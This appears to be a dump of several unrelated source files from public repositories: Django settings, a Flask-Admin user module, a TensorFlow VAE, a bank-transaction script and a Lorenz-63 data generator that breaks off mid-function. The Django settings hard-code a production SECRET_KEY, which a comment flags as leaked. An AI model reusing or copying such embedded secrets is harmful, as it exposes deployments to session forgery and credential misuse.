9f379d63dda0327a8796ebfd044bfb5ad1b596d0 | ee6699fcaaf03c230343ed3432afea41dca448df | /hellojango/settings.py | 12bcfce247c58246df03d51e3b3d11ed4a780282 | [] | no_license | dangmc/hello-jango | 63caaddcbf6ac6f985a511080b0af6fffd65adf5 | 2ecfd15f1d7659b1c15ee7040339eefed3b92974 | refs/heads/master | 2023-04-19T23:49:06.665683 | 2021-05-09T13:00:54 | 2021-05-09T13:00:54 | 365,738,459 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,359 | py | """
Django settings for hellojango project.
Generated by 'django-admin startproject' using Django 3.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): the key is hard-coded while DEBUG is False (i.e. this
# file is configured for production) -- load it from an environment
# variable (e.g. os.environ['SECRET_KEY']) and rotate this leaked value.
SECRET_KEY = '8rzu288fbaa%zbxb0a^$hnqn5nlrm=^(20x1n#@bht+aw5aw%6'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
# Hosts this deployment may serve: the Heroku app plus local development.
ALLOWED_HOSTS = ['hello-jango.herokuapp.com', '127.0.0.1']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'accounts',
'django_filters'
]
MIDDLEWARE = [
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'hellojango.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'hellojango.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/images/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static')
]
| [
"dangmc95@gmail.com"
] | dangmc95@gmail.com |
813eaf29b4b4374837f6acfd98ebb196f037da3f | fcc1566a5be75db2888fcfe265116db646f371d3 | /canella/admin/user.py | 99d99345838a8f71f660f657b840dfc8fdb3210c | [
"MIT"
] | permissive | mush42/Canella-CMS | 42ef94410d3009a64a5ae8dd6f6c209b816f9c14 | b5132c271a3b8840f0b165c62d14de6853a3e5ac | refs/heads/master | 2021-01-11T18:40:25.993093 | 2018-01-25T13:30:06 | 2018-01-25T13:30:06 | 79,596,685 | 8 | 2 | MIT | 2019-12-24T08:17:40 | 2017-01-20T20:44:38 | Python | UTF-8 | Python | false | false | 5,283 | py | from collections import OrderedDict
from flask import request, url_for, flash, redirect
from flask_security import current_user
from flask_security.utils import logout_user
from flask_admin import expose
from flask_admin import form
from flask_admin.model.form import InlineFormAdmin
from flask_admin.model.template import EndpointLinkRowAction
from flask_admin.contrib.sqla import ModelView
from flask_security.changeable import change_user_password
from jinja2 import Markup
from .. import app, db
from ..main import user_datastore
from ..babel import gettext, lazy_gettext
from ..user.models import User, Profile, Role
from ..util.wtf import FileSelectorField
from ..util.dynamicform import DynamicForm
from ..util.forms.register import CanellaRegisterForm, register_user
from ..util.forms.change_password import CanellaChangePasswordForm, change_password
from . import admin, CanellaModelView
class BaseUserAdmin(CanellaModelView):
    # Common base for all user-management admin views: restricts access
    # to users holding the 'admin' role.
    def is_accessible(self):
        # flask-admin hook; returning False hides the view and blocks requests.
        return current_user.has_role('admin')
class UserAdmin(BaseUserAdmin):
    """Admin view over user accounts.

    Adds custom endpoints for changing passwords, (de)activating
    accounts, and registering new users.  Creation through the default
    flask-admin form is disabled in favour of the /register/ view.
    """

    list_template = 'canella/admin/user/list.html'
    can_create = False
    column_exclude_list = ['password', 'slug', 'profile']
    form_excluded_columns = ['password', 'posts', 'profile', 'confirmed_at', 'slug']
    column_extra_row_actions = [
        EndpointLinkRowAction(icon_class="fa fa-lock", endpoint='.change_password', title=lazy_gettext("Change Password"), id_arg='pk'),
    ]

    @expose('/<int:pk>/change-password/', methods=['GET', 'POST'])
    def change_password(self, pk):
        """Render and handle the change-password form for user ``pk``.

        If an admin changes their own password they are logged out so
        the new credentials take effect immediately.
        """
        user = self.get_one(str(pk))
        form = CanellaChangePasswordForm(user=user)
        if form.validate_on_submit():
            # Resolves to the module-level flask-security helper imported
            # at the top of the file, not this method (class scope is not
            # searched from inside a method body).
            change_password(user, form.password.data)
            db.session.commit()
            if user.email == current_user.email:
                logout_user()
            flash(gettext('Password changed successfully'))
            return redirect(url_for('.index_view'))
        return self.render('admin/model/create.html', form=form)

    @expose('/<int:pk>/deactivate/', methods=['GET', 'POST'])
    def deactivate_user(self, pk):
        """Deactivate user ``pk`` (no-op if already inactive).

        Fixed: the original read ``user.is_active`` before ``user`` was
        assigned (NameError); the lookup now happens first, mirroring
        ``activate_user``.
        """
        user = self.get_one(str(pk))
        if user.is_active:
            user.is_active = False
            db.session.commit()
            flash(gettext('Account deactivated successfully'))
        return redirect(url_for('.index_view'))

    @expose('/<int:pk>/activate/', methods=['GET', 'POST'])
    def activate_user(self, pk):
        """Activate user ``pk`` (no-op if already active)."""
        user = self.get_one(str(pk))
        if not user.is_active:
            user.is_active = True
            db.session.commit()
            flash(gettext('Account activated successfully'))
        return redirect(url_for('.index_view'))

    @expose('/register/', methods=['GET', 'POST'])
    def register(self):
        """Register a new user account; optionally send a confirmation mail."""
        form = CanellaRegisterForm()
        if form.validate_on_submit():
            should_confirm = form.send_confirmation.data
            # Drop the checkbox so it is not forwarded as a user attribute.
            del form.send_confirmation
            register_user(should_confirm=should_confirm, **form.to_dict())
            return redirect(url_for('.index_view'))
        return self.render('admin/model/create.html', form=form)
class ProfileAdmin(BaseUserAdmin):
    # Admin view for user profiles.  Creation/deletion are disabled
    # (profiles are created alongside users); supports dynamically
    # generated extra fields driven by the PROFILE_EXTRA_FIELDS config.

    def on_form_prefill(self, form, id):
        # Populate the dynamic ``profile_extra__*`` fields from the
        # profile's stored extras before the edit form renders.
        # 15 == len('profile_extra__').
        model = self.get_one(id)
        for field in form:
            if field.name.startswith('profile_extra__'):
                field.data = model.get(field.name[15:])

    def after_model_change(self, form, model, is_created):
        # Persist the dynamic ``profile_extra__*`` fields back onto the
        # profile after a successful save.
        for field in form:
            if field.name.startswith('profile_extra__'):
                model[field.name[15:]] = field.data
        db.session.commit()

    @property
    def form_extra_fields(self):
        """Contribute the fields of profile extras"""
        # Always include the picture selector, then one generated field
        # per PROFILE_EXTRA_FIELDS entry (prefixed 'profile_extra__').
        rv = OrderedDict(image_path=FileSelectorField(label=lazy_gettext('Profile Picture'), button_text=lazy_gettext('Select Profile Picture')))
        extra_fields = list(app.config.get('PROFILE_EXTRA_FIELDS', []))
        for field in DynamicForm(*extra_fields, with_admin=True).fields:
            rv.setdefault('profile_extra__%s' %field[0], field[1])
        return rv

    def _list_thumbnail(view, context, model, name):
        # List-view column formatter: render the profile picture, or a
        # placeholder icon when none is set.  flask-admin invokes it as a
        # plain function, hence the (view, context, model, name) signature
        # instead of ``self``.
        if not model.image_path:
            return Markup('<span class="fa fa-2x fa-user"></span>')
        return Markup('<img src="%s" class="img-thumbnail img-circle" style="max-width:75px;max-height:75px;" />' % model.image.src)

    can_create = False
    can_delete = False
    column_exclude_list = ['user', 'created', 'extras']
    column_list = ['image_path', 'first_name', 'last_name', 'updated']
    # Must follow the _list_thumbnail definition above (class-body order).
    column_formatters = dict(image_path=_list_thumbnail)
    form_excluded_columns = ['user', 'image_description', 'extras', 'updated', 'created']
class RoleAdmin(BaseUserAdmin):
    # Admin view for roles/permissions; hide the back-reference column.
    column_exclude_list = ['user']
# Register the three views under the "Users" category of the admin menu,
# each with a Font Awesome icon.
admin.add_view(UserAdmin(User, db.session, name=lazy_gettext('User Accounts'), category=lazy_gettext('Users'), menu_icon_type='fa', menu_icon_value='fa-shield'))
admin.add_view(ProfileAdmin(Profile, db.session, name=lazy_gettext('Profiles'), category=lazy_gettext('Users'), menu_icon_type='fa', menu_icon_value='fa-user'))
admin.add_view(RoleAdmin(Role, db.session, name=lazy_gettext('Roles & Permissions'), category=lazy_gettext('Users'), menu_icon_type='fa', menu_icon_value='fa-lock'))
"Musharraf Omer"
] | Musharraf Omer |
2abeda39e8908452c1c0b37793f6fd7403db3217 | 83887f4f6a9d0c0dc4d7bde309ff024bb30772c9 | /model_vae.py | dd15fb8e21943b36c56fc2866f17c5f5791f56a8 | [] | no_license | Andreachen0707/stats_hw4 | 2842a7e9a0afba1c2111875497647d50c4ca9daa | 6dab2a54c60eb008d7bfc5830e2fe48e2a2f961e | refs/heads/master | 2020-03-09T01:01:57.960693 | 2018-04-07T06:44:05 | 2018-04-07T06:44:05 | 128,503,269 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,596 | py | from __future__ import division
import os
import time
from glob import glob
import tensorflow as tf
import numpy as np
import scipy.io as sio
from six.moves import xrange
from skimage import io
from ops import *
from utils import *
import random
import numpy as np
class VAE(object):
    """Convolutional variational autoencoder for 28x28 grayscale images
    (MNIST), written against the TensorFlow 1.x graph API.

    The encoder maps images to a latent Gaussian (mean + log-std); the
    decoder reconstructs images from latent samples.  The loss is the
    squared reconstruction error plus the analytic KL divergence.
    """

    def __init__(self, sess, image_size=28,
                 batch_size=100, sample_size=100, output_size=28,
                 z_dim=5, c_dim=1, dataset_name='default',
                 checkpoint_dir=None, sample_dir=None):
        """
        Args:
            sess: TensorFlow session
            image_size: The size of input image.
            batch_size: The size of batch. Should be specified before training.
            sample_size: (optional) The size of sampling. Should be specified before training.
            output_size: (optional) The resolution in pixels of the images. [28]
            z_dim: (optional) Dimension of latent vectors. [5]
            c_dim: (optional) Dimension of image color. For grayscale input, set to 1. [1]
        """
        self.sess = sess
        self.batch_size = batch_size
        self.image_size = image_size
        self.sample_size = sample_size
        self.output_size = output_size
        self.z_dim = z_dim
        self.c_dim = c_dim
        self.dataset_name = dataset_name
        self.checkpoint_dir = checkpoint_dir
        self.sample_dir = sample_dir
        # Build the full graph (placeholders, encoder/decoder, loss) now,
        # so train() only has to create the optimizer.
        self.build_model()

    def encoder(self, image, reuse=False, train=True):
        """Map a batch of images to latent samples.

        Returns (z, mu, log_std): a reparameterized latent sample plus
        the Gaussian parameters used to draw it.  ``train`` selects the
        batch-norm mode; ``reuse`` shares variables on repeated calls.
        """
        with tf.variable_scope("encoder", reuse=reuse) as scope:
            #######################################################
            # TODO: Define encoder network structure here. op.py
            # includes some basic layer functions for you to use.
            # Please use batch normalization layer after conv layer.
            # And use 'train' argument to indicate the mode of bn.
            # The output of encoder network should have two parts:
            # A mean vector and a log(std) vector. Both of them have
            # the same dimension with latent vector z.
            #######################################################
            reshape_input = tf.reshape(image, [-1, 28, 28, 1])
            # Three stride-2 conv + batch-norm + leaky-ReLU stages: 16 -> 32 -> 64 filters.
            h0 = lrelu(batch_norm(conv2d(reshape_input, 16, name='e_h0_conv_vae'), train = train, name = 'e_batch_0_vae'))
            h1 = lrelu(batch_norm(conv2d(h0, 32, name='e_h1_conv_vae'), train = train, name = 'e_batch_1_vae'))
            h2 = lrelu(batch_norm(conv2d(h1, 64, name='e_h2_conv_vae'), train = train, name = 'e_batch_2_vae'))
            # A flatten tensor with shape [h2.shape(0), k]
            fc = tf.contrib.layers.flatten(h2)
            mu = tf.layers.dense(fc, units = self.z_dim)
            # NOTE(review): log-std is derived as 0.5*mu rather than from
            # its own dense layer -- unusual for a VAE; confirm intended.
            std = 0.5 * mu
            # Reparameterization trick: z = mu + eps * exp(log_std).
            epsilon = tf.random_normal(tf.stack([tf.shape(fc)[0], self.z_dim]))
            z = mu + tf.multiply(epsilon, tf.exp(std))
            #h3 = lrelu(batch_norm(conv2d(h2, 64*8, name = 'd_h3_conv'), train = train, name = 'd_batch_3'))
            #h4 = linear(tf.reshape(h3, [self.batch_size, -1]), 1, 'd_h4_lin')
            return z, mu, std
            #######################################################
            # end of your code
            #######################################################

    def decoder(self, z, reuse=False, train=True):
        """Reconstruct a batch of 28x28 images from latent vectors ``z``.

        Output pixels are sigmoid-squashed into [0, 1].  When sampling
        images from a trained model, call with train=False so batch norm
        uses its accumulated statistics.
        """
        with tf.variable_scope("decoder", reuse=reuse):
            #######################################################
            # TODO: Define decoder network structure here. The size
            # of output should match the size of images. To make the
            # output pixel values in [0,1], add a sigmoid layer before
            # the output. Also use batch normalization layer after
            # deconv layer, and use 'train' argument to indicate the
            # mode of bn layer. Note that when sampling images using
            # trained model, you need to set train='False'.
            #######################################################
            # Project z to a 7x7x64 feature map, then upsample 7 -> 14 -> 28.
            h0 = tf.layers.dense(z, 64*7*7, name = 'd_ense2_vae')
            h0_reshape = tf.reshape(h0, [self.batch_size, 7, 7, 64])
            h0_deconv = deconv2d(h0_reshape, [self.batch_size, 7, 7, 32], d_w=1, d_h=1, name='d_conv1_vae')
            h0 = lrelu(batch_norm(h0_deconv, train = train, name = 'd_bn_0_vae'))
            h1_deconv = deconv2d(h0, [self.batch_size, 14, 14, 16], name = 'd_h1_vae')
            h1 = lrelu(batch_norm(h1_deconv, train = train, name = 'd_bn_1_vae'))
            h2_deconv = deconv2d(h1, [self.batch_size, 28, 28, 1], name = 'd_h2_vae')
            h2 = lrelu(batch_norm(h2_deconv, train = train, name = 'd_bn_2_vae'))
            # Final dense + sigmoid keeps pixel values in [0, 1].
            h3_fc = tf.contrib.layers.flatten(h2)
            h4 = tf.layers.dense(h3_fc, units = 28 * 28, activation = tf.nn.sigmoid)
            img_out = tf.reshape(h4, shape=[-1, 28, 28])
            return img_out
            #######################################################
            # end of your code
            #######################################################

    def build_model(self):
        """Define the input placeholder, wire encoder -> decoder, and
        assemble the VAE loss (reconstruction + KL divergence)."""
        #######################################################
        # TODO: In this build_model function, define inputs,
        # operations on inputs and loss of VAE. For input,
        # you need to define it as placeholders. Remember loss
        # term has two parts: reconstruction loss and KL divergence
        # loss. Save the loss as self.loss. Use the
        # reparameterization trick to sample z.
        #######################################################
        self.X_inputs = tf.placeholder(dtype = tf.float32, shape=[self.batch_size, 28, 28, 1], name = 'x_vae')
        Y = tf.reshape(self.X_inputs, shape = [-1, 28*28])
        self.z_sample, mu_sample, sd_sample = self.encoder(self.X_inputs)
        self.z_out = self.decoder(self.z_sample)
        Y_out = tf.reshape(self.z_out, [-1, 28*28])
        # Per-example squared reconstruction error over all 784 pixels.
        img_loss = tf.reduce_sum(tf.squared_difference(Y_out, Y), 1)
        # Analytic KL( N(mu, exp(sd)) || N(0, I) ), treating sd_sample as log-std.
        latent_loss = -0.5 * tf.reduce_sum(1.0 + 2.0 * sd_sample - tf.square(mu_sample) - tf.exp(2.0 * sd_sample), 1)
        self.loss = tf.reduce_mean(img_loss + latent_loss)
        #######################################################
        # end of your code
        #######################################################
        self.saver = tf.train.Saver()

    def train(self, config):
        """Train VAE"""
        # load MNIST dataset
        mnist = tf.contrib.learn.datasets.load_dataset("mnist")
        data = mnist.train.images
        data = data.astype(np.float32)
        data_len = data.shape[0]
        data = np.reshape(data, [-1, 28, 28, 1])
        optim = tf.train.AdamOptimizer(config.learning_rate, beta1=config.beta1).minimize(self.loss)
        try:
            self.sess.run(tf.global_variables_initializer())
        except:
            # Fallback for very old TF releases (deprecated initializer API).
            tf.initialize_all_variables().run()
        start_time = time.time()
        counter = 1
        # Resume from the latest checkpoint when one exists.
        if self.load(self.checkpoint_dir):
            print(" [*] Load SUCCESS")
        else:
            print(" [!] Load failed...")
        sample_dir = os.path.join(config.sample_dir, config.dataset)
        if not os.path.exists(config.sample_dir):
            os.mkdir(config.sample_dir)
        if not os.path.exists(sample_dir):
            os.mkdir(sample_dir)
        for epoch in xrange(config.epoch):
            batch_idxs = min(data_len, config.train_size) // config.batch_size
            # Fixed latent draws reused for the sampling snapshots this epoch.
            randoms = [np.random.normal(0,1,self.z_dim) for _ in range(100)]
            for idx in xrange(0, batch_idxs):
                counter += 1
                batch_images = data[idx*config.batch_size:(idx+1)*config.batch_size, :]
                #######################################################
                # TODO: Train your model here, print the loss term at
                # each training step to monitor the training process.
                # Print reconstructed images and sample images every
                # config.print_step steps. Sample z from standard normal
                # distribution for sampling images. You may use function
                # save_images in utils.py to save images.
                #######################################################
                _, loss, dec = self.sess.run([optim, self.loss, self.z_out], feed_dict={self.X_inputs: batch_images})
                if np.mod(counter, 10) == 1:
                    # Decode the fixed latent draws and save a 10x10 grid.
                    samples = self.sess.run(
                        [self.z_out],
                        feed_dict={
                            self.z_sample:randoms,
                        }
                    )
                    imgs = np.reshape(samples,[-1,28,28,1])
                    save_images(imgs, [10,10], './{}/train_{:02d}_{:04d}.png'.format(config.sample_dir, epoch, idx))
                    #print("[Sample] d_loss: %.8f, g_loss: %.8f" % (vae_loss))
                #######################################################
                # end of your code
                #######################################################
                if np.mod(counter, 500) == 2 or (epoch == config.epoch-1 and idx == batch_idxs-1):
                    self.save(config.checkpoint_dir, counter)
            # Save reconstructions from the last batch of this epoch.
            imgs = np.reshape(dec,[-1,28,28,1])
            save_images(imgs, [10,10], self.sample_dir+'/reconstruct_pic'+str(epoch)+'.png')

    def save(self, checkpoint_dir, step):
        # Persist the current graph variables under a per-config directory.
        model_name = "mnist.model"
        model_dir = "%s_%s_%s" % (self.dataset_name, self.batch_size, self.output_size)
        checkpoint_dir = os.path.join(checkpoint_dir, model_dir)
        if not os.path.exists(checkpoint_dir):
            os.makedirs(checkpoint_dir)
        self.saver.save(self.sess,
                        os.path.join(checkpoint_dir, model_name),
                        global_step=step)

    def load(self, checkpoint_dir):
        # Restore the latest checkpoint; returns True on success.
        print(" [*] Reading checkpoints...")
        model_dir = "%s_%s_%s" % (self.dataset_name, self.batch_size, self.output_size)
        checkpoint_dir = os.path.join(checkpoint_dir, model_dir)
        ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
        if ckpt and ckpt.model_checkpoint_path:
            ckpt_name = os.path.basename(ckpt.model_checkpoint_path)
            self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))
            print(" [*] Success to read {}".format(ckpt_name))
            return True
        else:
            print(" [*] Failed to find a checkpoint")
            return False
| [
"andreachen0707@gmail.com"
] | andreachen0707@gmail.com |
0f65d46ae561c592837b870f9c64513c23ec0aa1 | d496e9b71a9cdc226c8005b7d1be53a0c9154a36 | /bankTransaction.py | 42e856699d126b93469811cccc9dbe9cf57a3130 | [] | no_license | Shubham-S-Yadav/Python | 1f83e4a28e304679e16829613d845e8eae6f3921 | 830537dd02b60bb9f00a9079556a0c9323a26c17 | refs/heads/master | 2021-07-03T06:39:06.150795 | 2017-09-22T14:05:01 | 2017-09-22T14:05:01 | 104,320,745 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,118 | py | '''
Write a program that computes the net amount of a bank account based a transaction log from file. The transaction log format is shown as following:
D 100
W 200
D means deposit while W means withdrawal.
Suppose the following input is supplied to the program:
D 300
D 300
W 200
D 100
Then, the output should be:
Total Deposit = 700
Total Withdrawal = 200
Total Balance = 500
'''
def parse_transaction(line):
    """Parse a transaction line such as ``'D 100'``.

    Returns a ``(code, amount)`` tuple with the code upper-cased, or
    ``None`` when the line is not ``<letter> <non-negative integer>``.
    (Fixes the original crash: ``line.split(" ")`` unpacked into two
    names and raised ValueError on single-word input such as ``'E'``.)
    """
    parts = line.split()
    if len(parts) != 2 or not parts[1].isdigit():
        return None
    return parts[0].upper(), int(parts[1])


def process_transactions(lines):
    """Apply a sequence of transaction lines and return the totals.

    Returns ``(total_deposit, total_withdrawal, balance)``.  Withdrawals
    larger than the current balance are rejected (a withdrawal equal to
    the balance is allowed -- the original ``B <= amount`` test wrongly
    refused it); malformed or unknown lines are ignored.
    """
    deposit = withdrawal = balance = 0
    for line in lines:
        parsed = parse_transaction(line)
        if parsed is None:
            continue
        code, amount = parsed
        if code == 'D':
            deposit += amount
            balance += amount
        elif code == 'W' and amount <= balance:
            withdrawal += amount
            balance -= amount
    return deposit, withdrawal, balance


if __name__ == '__main__':
    # Interactive session.  Unlike the original, an insufficient-funds
    # withdrawal reports the failure and continues instead of ending the
    # whole session.
    B = D = W = 0  # balance, total deposited, total withdrawn
    while True:
        entry = input("Enter transaction [D <amt> deposit, W <amt> withdraw, E exit]: ")
        if entry.strip().upper() == 'E':
            break
        parsed = parse_transaction(entry)
        if parsed is None:
            print("Invalid Input.")
            continue
        code, amount = parsed
        if code == 'D':
            D += amount
            B += amount
        elif code == 'W':
            if amount > B:
                print("Not Sufficient Balance.\nTransaction failed.")
            else:
                W += amount
                B -= amount
        else:
            print("Invalid Input.")
    print("Total Balance: Rs.", B)
    print("Total Deposited amount: Rs.", D)
    print("Total Withdrawal amount: Rs.", W)
"31968975+Shubham-S-Yadav@users.noreply.github.com"
] | 31968975+Shubham-S-Yadav@users.noreply.github.com |
c9401a9c4987563894c3464eff93b60aae22534e | e010333317fe8a90feb6f07a3ad8a44da0effea1 | /generate_Lorenz_data.py | 043b421aecd4c2a2c7e086daa7ec2ad591b4cfa5 | [] | no_license | xinjialimath/Takens_EnKF | f2bbcc8cab06efe1e0202212e89d118e148c652c | 380b021358f1286f818ecfa73d98e7edaafe25fc | refs/heads/master | 2023-02-06T17:36:58.736569 | 2020-12-27T15:25:05 | 2020-12-27T15:25:05 | 324,788,321 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,670 | py | import numpy as np
import os
import time,datetime
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from scipy.integrate import odeint
from Lorenz import Lorenz
from utils import lorenz63, hx_x, mkdir
from config import Config
from tqdm import tqdm
class Generate_Lorenz63_Data():
    """Generates Lorenz-63 trajectories -- clean, with process noise, and
    with measurement noise -- and saves states/measurements plus
    diagnostic figures into per-run directories under ../Lorenz_data/."""

    def __init__(self, config):
        self.params = config.params  # Lorenz system parameters
        self.z_dim = config.z_dim # dimension of measurement
        self.x_dim = len(config.initial_states)  # state dimension (3 for Lorenz-63)
        self.initial_states = config.initial_states
        self.h = config.h  # subsampling stride used when saving ground truth
        self.dt = config.dt  # integration time step
        self.end = config.end  # simulation end time
        self.R = config.R  # measurement-noise variance
        self.Q = config.Q  # process-noise variance
        self.t = np.arange(0, config.end, config.dt)
        self.epoch = int(config.end / config.dt) + 1  # number of generated steps
        self.states_clean_list = list()  # noise-free states
        self.states_list = list()  # states with process noise
        self.measures_list = list()  # noisy measurements
        self.states_params_list = list() #all_states = states (x,y,z) and params
        self.states_params_clean_list = list()
        self.gt_ode = None  # ground truth from scipy.integrate.odeint
        self.gt_Euler = None  # ground truth from the Euler stepper
        self.lorenz_dir = None
        self.figure_dir = None
        self.data_dir = None

    def initial_config_and_dirs(self, index):
        """Create the per-run directory tree ../Lorenz_data/<index>/{figures,data}
        and append the run configuration to config.txt."""
        # dateArray = datetime.datetime.fromtimestamp(time.time())
        # self.begin_time = dateArray.strftime("%Y_%m_%d_%H_%M_%S")
        # self.lorenz_dir = '../Lorenz_data/' + self.begin_time
        self.lorenz_dir = '../Lorenz_data/' + str(index)
        self.figure_dir = os.path.join(self.lorenz_dir, 'figures')
        self.data_dir = os.path.join(self.lorenz_dir, 'data')
        mkdir(self.lorenz_dir)
        mkdir(self.figure_dir)
        mkdir(self.data_dir)
        #save config
        f = open(os.path.join(self.lorenz_dir, 'config.txt'), mode='a+')
        # config_dict = config.__dict__
        # for key,value in config_dict:
        #     if key in ['params', 'initial_states', 'dt', 'end', 'h', 'epoch']:
        #         f.writelines('{}: {}\r'.format(key,value))
        f.writelines('{}: {}\r'.format('params',self.params))
        f.writelines('{}: {}\r'.format('initial_states',self.initial_states))
        f.writelines('{}: {}\r'.format('dt',self.dt))
        f.writelines('{}: {}\r'.format('end',self.end))
        f.writelines('{}: {}\r'.format('h',self.h))
        f.writelines('{}: {}\r'.format('epoch',self.epoch))
        f.writelines('{}: {}\r'.format('R',self.R))
        f.writelines('{}: {}\r'.format('Q',self.Q))
        f.writelines('{}: {}\r'.format('z_dim',self.z_dim))
        f.close()

    def GT_from_odeint(self,save_name='lorenz63_gt_ode.jpg'):
        #Ground truth by odeint
        # Integrate the Lorenz-63 ODE with scipy and save a 3-D plot.
        self.gt_ode = odeint(lorenz63, tuple(self.initial_states), self.t)
        x_ode = self.gt_ode[:, 0]
        y_ode = self.gt_ode[:, 1]
        z_ode = self.gt_ode[:, 2]
        fig = plt.figure()
        ax = Axes3D(fig)
        ax.plot(x_ode, y_ode, z_ode, 'b')
        plt.title('Lorenz63 system, ground truth from odeint, $x_0$={},$y_0$={},$z_0$={}'.format(
            self.initial_states[0], self.initial_states[1], self.initial_states[2]))
        plt.xlabel('x')
        plt.ylabel('y')
        # plt.show()
        plt.savefig(os.path.join(self.figure_dir, save_name))
        plt.close()

    def GT_from_Euler(self,save_name='lorenz63_gt_Euler.jpg'):
        # Ground truth by Euler
        # Step the Lorenz model with the explicit-Euler integrator and plot.
        lorenz = Lorenz(self.params, self.initial_states, delta_t=self.dt)
        self.gt_Euler = list()
        for i in range(len(self.t)):
            x = lorenz.run()
            # run() appends to its internal trajectory; keep the last (x, y, z).
            self.gt_Euler.append([x[-3], x[-2], x[-1]])
        self.gt_Euler = np.array(self.gt_Euler)
        fig = plt.figure(figsize=(12, 6))
        ax = fig.gca(projection='3d')  # get the current axes in 3-D projection mode
        ax.plot(self.gt_Euler[:, 0], self.gt_Euler[:, 1], self.gt_Euler[:, 2], lw=1.0, color='b')  # plot the trajectory
        plt.title('Lorenz system,$x_0$={},$y_0$={},$z_0$={}'.format(
            self.initial_states[0], self.initial_states[1], self.initial_states[2]))
        plt.xlabel('x')
        plt.ylabel('y')
        # plt.show()
        plt.savefig(os.path.join(self.figure_dir, save_name))
        plt.close()

    def save_gt(self, method='Euler'):
        # save data
        # Subsample every h-th ground-truth state and save it as .npy.
        # NOTE(review): the loop bound uses self.gt_Euler.shape[0] even
        # when method == 'odeint' selects self.gt_ode -- works only while
        # both trajectories have the same length; confirm intended.
        assert method in ['odeint', 'Euler']
        if method == 'Euler':
            data = self.gt_Euler
        else:
            data = self.gt_ode
        sample_state = []
        save_path = os.path.join(self.data_dir, 'gt_{}_state.npy'.format(method))
        for i in range(self.gt_Euler.shape[0]):
            if i % self.h == 0:
                sample_state.append(data[i, :])
        sample_state = np.array(sample_state)
        np.save(save_path, sample_state)

    def GT_noise_from_Euler(self):
        """Generate the noisy trajectory: Euler steps plus Gaussian process
        noise (variance Q) and Gaussian measurement noise (variance R);
        save clean/noisy states, state+parameter stacks, and measurements."""
        initial_states = np.array(self.initial_states)
        states = initial_states #+ self.Q * np.ones(self.x_dim) #np.diagonal(np.eye()) #system noise
        # NOTE(review): the first measurement adds R as a constant offset,
        # while subsequent ones draw sqrt(R)*N(0,1) -- confirm intended.
        measures = hx_x(states) + self.R * np.ones(self.z_dim)
        self.states_list.append(states)
        self.measures_list.append(measures)
        self.states_clean_list.append(initial_states)
        for i in range(self.epoch - 1):
            # lorenz63 is used here as a one-step propagator with step dt.
            states_clean = lorenz63(states, self.dt)
            states = states_clean + np.sqrt(self.Q) * np.random.normal(size=self.x_dim)
            measures = hx_x(states) + np.sqrt(self.R) * np.random.normal(size=self.z_dim)
            self.states_list.append(states)
            self.measures_list.append(measures)
            self.states_clean_list.append(states_clean)
            self.states_params_list.append(np.hstack((states, np.array(self.params))))
            self.states_params_clean_list.append(np.hstack((states_clean, np.array(self.params))))
        np.save(os.path.join(self.data_dir, 'states_clean.npy'), np.array(self.states_clean_list))
        np.save(os.path.join(self.data_dir, 'states.npy'), np.array(self.states_list))
        np.save(os.path.join(self.data_dir, 'states_params_clean.npy'), np.array(self.states_params_clean_list))
        np.save(os.path.join(self.data_dir, 'states_params.npy'), np.array(self.states_params_list))
        np.save(os.path.join(self.data_dir, 'measures.npy'), np.array(self.measures_list))

    def show_measures_from_Euler(self):
        # Plot the x-component (the measured quantity) of the clean,
        # process-noisy, and fully-noisy trajectories for comparison.
        measures_clean_list = (np.array(self.states_clean_list)[:, 0]).reshape(-1) # without system error and measurement error
